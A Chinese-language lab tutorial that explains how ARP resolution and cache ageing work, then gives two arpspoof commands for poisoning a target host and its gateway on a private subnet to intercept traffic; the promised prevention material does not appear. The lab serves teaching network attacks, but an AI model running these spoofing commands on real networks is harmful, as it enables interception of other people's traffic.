利用arpspoof實現ARP欺騙***

【實驗目的】:

瞭解ARP欺騙原理,掌握ARP欺騙的方法及預防ARP***的方法。

【ARP協議原理】:

我們以主機A向主機B發送數據爲例。當發送數據時,主機A會在自己的ARP緩存表中尋找是否有目標IP地址。如果找到了,也就知道了目標MAC地址,直接把目標MAC地址寫入幀裏面發送就可以了;如果在ARP緩存表中沒有找到相對應的IP地址,主機A就會在網絡上發送一個廣播,目標MAC地址是“FF.FF.FF.FF.FF.FF”,這表示向同一網段內的所有主機發出這樣的詢問:“主機B的MAC地址是什麼?”網絡上其他主機並不響應ARP詢問,只有主機B接收到這個幀時,才向主機A做出這樣的迴應:“主機B的MAC地址是00-aa-00-62-c6-09”。這樣,主機A就知道了主機B的MAC地址,它就可以向主機B發送信息了。同時它還更新了自己的ARP緩存表,下次再向主機B發送信息時,直接從ARP緩存表裏查找就可以了。ARP緩存表採用了老化機制,在一段時間內如果表中的某一行沒有使用,就會被刪除,這樣可以大大減少ARP緩存表的長度,加快查詢速度。


欺騙:arpspoof -i eth0 -t 172.28.15.53 172.28.15.254 

監控:arpspoof -i eth0 -t 172.28.15.254 172.28.15.53

arpspoof -i 列出網卡數,記下序號

wKiom1fiPQTQpelnAAQGu1XxJyc466.png-wh_50

wKioL1fiPd_AIBDpAAPQvfgD4wA829.png-wh_50

wKiom1fiPeKBMmZjAAdeobCM028686.png-wh_50

wKioL1fiPeTDIZksAAP9dGJrFXs350.png-wh_50


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章